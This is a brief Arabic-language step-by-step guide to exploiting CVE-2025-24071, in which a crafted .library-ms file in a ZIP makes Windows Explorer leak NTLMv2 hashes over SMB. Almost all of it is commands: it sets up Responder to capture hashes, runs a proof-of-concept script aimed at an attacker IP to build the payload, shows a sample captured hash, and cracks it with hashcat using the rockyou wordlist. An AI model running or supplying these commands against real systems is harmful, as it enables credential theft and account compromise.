
CVE-2025-24071: كشف هاش NTLMv2 عبر ملف .library-ms
sudo apt update && sudo apt install responder -y
شغّل Responder
sudo responder -I eth0
تثبيت وحدة Python المطلوبة
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
سيؤدي هذا إلى إنشاء: testpayload.library-ms testpayload.zip
انقل testpayload.zip إلى جهاز اختبار Windows 11. استخرج ملف ZIP باستخدام مستكشف Windows. يؤدي هذا إلى جعل Windows يحاول الوصول إلى مسار SMB، مما يؤدي إلى تسريب تجزئة NTLM.
responder -I etho0

أنشئ ملف hash,txt
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
الأكثر شيوعًا rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
